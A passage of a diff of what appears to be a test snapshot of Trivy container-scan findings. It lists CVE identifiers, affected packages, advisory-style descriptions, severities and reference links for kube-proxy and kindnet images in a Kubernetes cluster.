"https://bugzilla.redhat.com/2073310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", - "https://errata.almalinux.org/9/ALSA-2022-4940.html", - "https://errata.rockylinux.org/RLSA-2022:4940", - "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", - "https://linux.oracle.com/cve/CVE-2022-1271.html", - "https://linux.oracle.com/errata/ELSA-2022-5052.html", - "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", - "https://security-tracker.debian.org/tracker/CVE-2022-1271", - "https://security.gentoo.org/glsa/202209-01", - "https://security.netapp.com/advisory/ntap-20220930-0006/", - "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", - "https://ubuntu.com/security/notices/USN-5378-1", - "https://ubuntu.com/security/notices/USN-5378-2", - "https://ubuntu.com/security/notices/USN-5378-3", - "https://ubuntu.com/security/notices/USN-5378-4", - "https://www.cve.org/CVERecord?id=CVE-2022-1271", - "https://www.openwall.com/lists/oss-security/2022/04/07/8", + "http://www.securityfocus.com/bid/109167", + "https://access.redhat.com/security/cve/CVE-2019-1010023", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010023", + "https://www.cve.org/CVERecord?id=CVE-2019-1010023", ], }, "category": "Vulnerability", - "description": "An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "arbitrary-file-write vulnerability", + "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1271", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:4940", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1271", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2073310", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", + "value": "http://www.securityfocus.com/bid/109167", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-4940.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:4940", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", }, { "type": "URL", - "value": "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1271.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5052.html", + "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", + "value": "https://ubuntu.com/security/CVE-2019-1010023", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010024", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "http://www.securityfocus.com/bid/109162", + "https://access.redhat.com/security/cve/CVE-2019-1010024", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010024", + "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: ASLR bypass using cache of thread stack and heap", + "references": [ { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2022-1271", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-01", + "value": "http://www.securityfocus.com/bid/109162", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220930-0006/", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", }, { "type": "URL", - "value": "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-1", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-2", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-3", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-4", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1271", + "value": "https://ubuntu.com/security/CVE-2019-1010024", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/04/07/8", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "10.36-2+deb11u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1586", - "installedVersion": "10.36-2", - "packageName": "libpcre2-8-0", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010025", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/errata/RHSA-2022:5809", - "https://access.redhat.com/security/cve/CVE-2022-1586", - "https://bugzilla.redhat.com/2077976", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077976", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077976,", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1586", - "https://errata.almalinux.org/8/ALSA-2022-5809.html", - "https://errata.rockylinux.org/RLSA-2022:5809", - "https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a,", - "https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc388f89095b184ba6d99422cfc676c", - "https://linux.oracle.com/cve/CVE-2022-1586.html", - "https://linux.oracle.com/errata/ELSA-2022-5809.html", - "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1586", - "https://security.netapp.com/advisory/ntap-20221028-0009/", - "https://ubuntu.com/security/notices/USN-5627-1", - "https://ubuntu.com/security/notices/USN-5627-2", - "https://www.cve.org/CVERecord?id=CVE-2022-1586", + "https://access.redhat.com/security/cve/CVE-2019-1010025", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010025", + "https://www.cve.org/CVERecord?id=CVE-2019-1010025", ], }, "category": "Vulnerability", - "description": "An out-of-bounds read vulnerability was discovered in the PCRE2 library in the compile_xclass_matchingpath() function of the pcre2_jit_compile.c file. This involves a unicode property matching issue in JIT-compiled regular expressions. The issue occurs because the character was not fully read in case-less matching within JIT.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "pcre2: Out-of-bounds read in compile_xclass_matchingpath in pcre2_jit_compile.c", + "name": "glibc: information disclosure of heap addresses of pthread_created thread", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1586", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:5809", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1586", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2077976", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077976", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077976,", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1586", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2022-5809.html", + "value": "https://ubuntu.com/security/CVE-2019-1010025", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5809", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-19126", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-19126", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", + "https://linux.oracle.com/cve/CVE-2019-19126.html", + "https://linux.oracle.com/errata/ELSA-2020-3861.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", + "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", + "https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-19126", + ], + }, + "category": "Vulnerability", + "description": "On the x86-64 architecture, the GNU C Library (aka glibc) before 2.31 fails to ignore the LD_PREFER_MAP_32BIT_EXEC environment variable during program execution after a security transition, allowing local attackers to restrict the possible mapping addresses for loaded libraries and thus bypass ASLR for a setuid program.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: LD_PREFER_MAP_32BIT_EXEC not ignored in setuid binaries", + "references": [ { "type": "URL", - "value": "https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a,", + "value": "https://avd.aquasec.com/nvd/cve-2019-19126", }, { "type": "URL", - "value": "https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc388f89095b184ba6d99422cfc676c", + "value": "https://access.redhat.com/security/cve/CVE-2019-19126", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1586.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5809.html", + "value": "https://linux.oracle.com/cve/CVE-2019-19126.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", + "value": "https://linux.oracle.com/errata/ELSA-2020-3861.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1586", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221028-0009/", + "value": "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5627-1", + "value": "https://ubuntu.com/security/notices/USN-4416-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5627-2", + "value": "https://usn.ubuntu.com/4416-1/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1586", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-19126", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "10.36-2+deb11u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1587", - "installedVersion": "10.36-2", - "packageName": "libpcre2-8-0", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-9192", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-1587", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077983,", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1587", - "https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0", - "https://linux.oracle.com/cve/CVE-2022-1587.html", - "https://linux.oracle.com/errata/ELSA-2022-5251.html", - "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1587", - "https://security.netapp.com/advisory/ntap-20221028-0009/", - "https://ubuntu.com/security/notices/USN-5627-1", - "https://ubuntu.com/security/notices/USN-5627-2", - "https://www.cve.org/CVERecord?id=CVE-2022-1587", + "https://access.redhat.com/security/cve/CVE-2019-9192", + "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2019-9192", ], }, "category": "Vulnerability", - "description": "An out-of-bounds read vulnerability was discovered in the PCRE2 library in the get_recurse_data_length() function of the pcre2_jit_compile.c file. This issue affects recursions in JIT-compiled regular expressions caused by duplicate data transfers.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "pcre2: Out-of-bounds read in get_recurse_data_length in pcre2_jit_compile.c", + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1587", + "value": "https://avd.aquasec.com/nvd/cve-2019-9192", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1587", + "value": "https://access.redhat.com/security/cve/CVE-2019-9192", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077983,", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1587", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", }, { "type": "URL", - "value": "https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1587.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-27645", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-27645", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", + "https://linux.oracle.com/cve/CVE-2021-27645.html", + "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", + "https://security.gentoo.org/glsa/202107-07", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://www.cve.org/CVERecord?id=CVE-2021-27645", + ], + }, + "category": "Vulnerability", + "description": "The nameserver caching daemon (nscd) in the GNU C Library (aka glibc or libc6) 2.29 through 2.33, when processing a request for netgroup lookup, may crash due to a double-free, potentially resulting in degraded service or Denial of Service on the local system. This is related to netgroupcache.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: Use-after-free in addgetnetgrentX function in netgroupcache.c", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2021-27645", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5251.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-27645", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", + "value": "https://linux.oracle.com/cve/CVE-2021-27645.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", + "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1587", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221028-0009/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5627-1", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5627-2", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1587", + "value": "https://ubuntu.com/security/notices/USN-5310-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-27645", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-11164", - "installedVersion": "2:8.39-13", - "packageName": "libpcre3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-8457", + "installedVersion": "5.3.28+dfsg1-0.5", + "packageName": "libdb5.3", "references": [ - "http://openwall.com/lists/oss-security/2017/07/11/3", - "http://www.openwall.com/lists/oss-security/2023/04/11/1", - "http://www.openwall.com/lists/oss-security/2023/04/12/1", - "http://www.securityfocus.com/bid/99575", - "https://access.redhat.com/security/cve/CVE-2017-11164", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", - "https://www.cve.org/CVERecord?id=CVE-2017-11164", + "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", + "https://access.redhat.com/security/cve/CVE-2019-8457", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", + "https://linux.oracle.com/cve/CVE-2019-8457.html", + "https://linux.oracle.com/errata/ELSA-2020-1810.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", + "https://security.netapp.com/advisory/ntap-20190606-0002/", + "https://ubuntu.com/security/notices/USN-4004-1", + "https://ubuntu.com/security/notices/USN-4004-2", + "https://ubuntu.com/security/notices/USN-4019-1", + "https://ubuntu.com/security/notices/USN-4019-2", + "https://usn.ubuntu.com/4004-1/", + "https://usn.ubuntu.com/4004-2/", + "https://usn.ubuntu.com/4019-1/", + "https://usn.ubuntu.com/4019-2/", + "https://www.cve.org/CVERecord?id=CVE-2019-8457", + "https://www.oracle.com/security-alerts/cpuapr2020.html", + "https://www.oracle.com/security-alerts/cpujan2020.html", + "https://www.oracle.com/security-alerts/cpujul2020.html", + "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", + "https://www.sqlite.org/releaselog/3_28_0.html", + "https://www.sqlite.org/src/info/90acdbfce9c08858", ], }, "category": "Vulnerability", - "description": "In PCRE 8.41, the OP_KETRMAX feature in the match function in pcre_exec.c allows stack exhaustion (uncontrolled recursion) when processing a crafted regular expression.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "SQLite3 from 3.6.0 to and including 3.27.2 is vulnerable to heap out-of-bound read in the rtreenode() function when handling invalid rtree tables.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "pcre: OP_KETRMAX feature in the match function in pcre_exec.c", + "name": "sqlite: heap out-of-bound read in function rtreenode()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-11164", - }, - { - "type": "URL", - "value": "http://openwall.com/lists/oss-security/2017/07/11/3", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/11/1", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/12/1", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/99575", + "value": "https://avd.aquasec.com/nvd/cve-2019-8457", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-11164", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", + "value": "https://access.redhat.com/security/cve/CVE-2019-8457", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-11164", + "value": "https://linux.oracle.com/cve/CVE-2019-8457.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-16231", - "installedVersion": "2:8.39-13", - "packageName": "libpcre3", - "references": [ - "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", - "http://seclists.org/fulldisclosure/2018/Dec/33", - "http://www.openwall.com/lists/oss-security/2017/11/01/11", - 